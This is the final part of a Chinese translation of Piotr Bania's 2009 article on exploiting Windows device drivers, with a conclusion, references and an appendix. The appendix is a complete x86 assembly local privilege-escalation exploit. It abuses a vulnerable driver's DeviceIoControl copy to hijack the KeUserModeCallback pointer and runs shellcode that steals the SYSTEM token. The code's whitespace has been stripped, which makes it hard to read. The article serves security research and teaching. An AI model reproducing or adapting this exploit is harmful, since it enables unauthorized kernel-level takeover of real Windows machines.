详解如何利用Windows设备驱动
2009-02-12 13:55:33 来源:WEB开发网结束语
最后希望你能够喜欢这个文档,如果你有什么疑问不能解决,请联系我。所有文章中设计的程序可以在网站http://pb.specialised.info 上下载。
参考文献:
1) Win32 Device Drivers Communication Vulnerabilities
2) "Remote Windows Kernel Exploitation – Step into the Ring 0", by Barnaby Jack –
eEYE digital security – http://www.eeye.com
3) Eyas shellcode publication - ?
4) "The Windows 2000/NT Native Api Reference", by Gary Nebett
5) "Windows Syscall Shellcode", by myself -http://www.securityfocus.net/infocus/1844
6) http://pb.specialised.info
附录:exploit
;------------------------------------------------------------
;Samplelocaldevicedriverexploit
;byPiotrBania
;http://pb.specialised.info
;Allrightsreserved
;------------------------------------------------------------
includemy_macro.inc
DEVICE_NAMEequ".BUGGY"
MY_ADDRESSequ000110000h
MY_ADDRESS_SIZEequ512h;somemore
D_PACKETstruct
dp_destdd0
dp_srcdd0
D_PACKETends
callfind_KeUserModeCallback_Routine
callget_ntos_base
moveax,dwordptr[real_ntos_base]
adddwordptr[KeUserModeCallback_Routine],eax
callopen_device
movebx,eax
pushPAGE_EXECUTE_READWRITE
pushMEM_COMMIT
pushMY_ADDRESS_SIZE
pushMY_ADDRESS
@callxVirtualAlloc
@check0,"Error:cannotallocatememory!"
movedi,eax
;firstsignalcopiesoriginalbytestothebuffer
moveax,dwordptr[KeUserModeCallback_Routine]
movdwordptr[routine_addr],eax
mov[edi.D_PACKET.dp_src],eax
mov[edi.D_PACKET.dp_dest],edi
add[edi.D_PACKET.dp_dest],8
movecx,512
calltalk2device
;originalbytesarestoredatedi+8(insizeof512)
;nowletsfilltheshellcode
moveax,[edi+8]
movdwordptr[old_routine],eax
movdwordptr[old_routine2],eax
@callxGetCurrentProcessId
movdwordptr[my_pid],eax
pushedi
movecx,my_shellcode_size
addedi,512+8
leaesi,my_shellcode
repmovsb
popedi
;maketheoldKeUserModeCallback_Routinepointtoourshellcode
;andexchangethesourcepacketwithdestinationpacket
mov[edi+8],edi
add[edi+8],512+8
moveax,[edi.D_PACKET.dp_src]
movedx,[edi.D_PACKET.dp_dest]
mov[edi.D_PACKET.dp_src],edx
mov[edi.D_PACKET.dp_dest],eax
movecx,MY_ADDRESS_SIZE
calltalk2device
pushMEM_DECOMMIT
pushMY_ADDRESS_SIZE
pushedi
@callxVirtualFree
@debug"I'mescalated!!!",MB_ICONINFORMATION
exit:
push0
@callxExitProcess
;------------------------------------------------------------
;DeviceDrivershellcode
;------------------------------------------------------------
XP_PID_OFFSETequ084h
XP_FLINK_OFFSETequ088h
XP_TOKEN_OFFSETequ0C8h
XP_SYS_PIDequ04h
my_shellcodeproc
pushad
db0b8h;moveax,old_routine
old_routinedd0;hardcoded
db0b9h;movecx,routine_addr
routine_addrdd0;thistoo
mov[ecx],eax;restoreoldroutine
;avoidmultiplecalls...
;-----------------------------------------
;startescalationprocedure
;-----------------------------------------
moveax,dwordptrfs:[124h]
moveax,[eax+44h]
pusheax;EAX=EPROCESS
s1:moveax,[eax+XP_FLINK_OFFSET];EAX=
EPROCESS.ActiveProcessLinks.Flink
subeax,XP_FLINK_OFFSET;EAX=EPROCESSofnextprocess
cmp[eax+XP_PID_OFFSET],XP_SYS_PID;UniqueProcessId==SYSTEMPID?
jnes1;nope,continuesearch
;EAX=foundEPROCESS
movedi,[eax+XP_TOKEN_OFFSET];ptrtoEPROCESS.token
andedi,0fffffff8h;alignedby8
popeax;EAX=EPROCESS
db68h;hardcodedpush
my_piddd0
popebx;EBX=pidtoescalate
s2:
moveax,[eax+XP_FLINK_OFFSET];EAX=EPROCESS.ActiveProcessLinks.Flink
subeax,XP_FLINK_OFFSET;EAX=EPROCESSofnextprocess
cmp[eax+XP_PID_OFFSET],ebx;isitourPID???
jnes2;nope,trynextone
mov[eax+XP_TOKEN_OFFSET],edi;party'sover:)
popad
db68h;pushold_routine
old_routine2dd0;ret
ret
tok_handledd0
my_shellcode_sizeequ$-offsetmy_shellcode
my_shellcodeendp
;------------------------------------------------------------
;findstheKeUserModeCallback_Routinefromntoskrnl.exe
;------------------------------------------------------------
find_KeUserModeCallback_Routineproc
pushad
push1;DONT_RESOLVE_DLL_REFERENCES
push0
@pushsz"C:windowssystem32ntoskrnl.exe"
@callxLoadLibraryExA
@check0,"Error:cannotloadlibrary"
movebx,eax
@pushsz"KeUserModeCallback"
pusheax
@callxGetProcAddress
movedi,eax
@check0,"Error:cannotobtainKeUserModeCallbackaddress"
scan_for_call:incedi
cmpwordptr[edi],015FFh
jnescan_for_call
moveax,[edi+2]
movecx,[ebx+3ch]
addecx,ebx
movecx,[ecx+34h]
subeax,ecx
movdwordptr[KeUserModeCallback_Routine],eax
popad
ret
find_KeUserModeCallback_Routineendp
;------------------------------------------------------------
;Getsntoskrnl.exemodulebase(real)
;------------------------------------------------------------
get_ntos_baseproc
local__MODULES:_MODULES
pushad
@get_api_addr"ntdll","NtQuerySystemInformation"
@check0,"Error:cannotgrabNtQuerySystemInformationaddress"
movebx,eax
calla1
nsdd0
a1:push4
leaecx,[__MODULES]
pushecx
pushSystemModuleInformation
calleax
cmpeax,0c0000004h
jneerror_ntos
pushdwordptr[ns]
pushGMEM_FIXEDorGMEM_ZEROINIT
@callxGlobalAlloc
movebp,eax
push0
pushdwordptr[ns]
pushebp
pushSystemModuleInformation
callebx
testeax,eax
jnzerror_ntos
moveax,dwordptr[ebp.smi_Base]
movdwordptr[real_ntos_base],eax
pushebp
@callxGlobalFree
popad
ret
error_ntos:xoreax,eax
@check0,"Error:cannotexecuteNtQuerySystemInformation"
get_ntos_baseendp
;------------------------------------------------------------
;Opensthedevicewearetryingtoattack
;------------------------------------------------------------
open_deviceproc
pushad
push0
push80h
push3
push0
push0
push0
@pushszDEVICE_NAME
@callxCreateFileA
@check-1,"Error:cannotopendevice!"
movdwordptr[esp+PUSHA_STRUCT._EAX],eax
popad
ret
open_deviceendp
;------------------------------------------------------------
;Procedurethatcommunicateswiththedriver
;
;ENTRY->EDI=INPUTBUFFER
;ECX=INPUTBUFFERSIZE
;EBX=DEVICEHANDLE
;------------------------------------------------------------
talk2deviceproc
pushad
push0
pushoffsetbytes_ret
push0
push0
pushecx
pushedi
push011111111h
pushebx
@callxDeviceIoControl
@check0,"Error:Send()failed"
popad
ret
bytes_retdd0
talk2deviceendp
_MODULESstruct
dwNModulesdd0
smi_Reserveddd2dup(0)
smi_Basedd0
smi_Sizedd0
smi_Flagsdd0
smi_Indexdw0
smi_Unknowndw0
smi_LoadCountdw0
smi_ModuleNamedw0
smi_ImageNamedb256dup(0)
ends
SystemModuleInformationequ11
KeUserModeCallback_Routinedd0
real_ntos_basedd0
basedd0
includedebug.inc
endstart
原文作者:Piotr Bania
译者BLOG:http://hi.baidu.com/ayarei
更多精彩
赞助商链接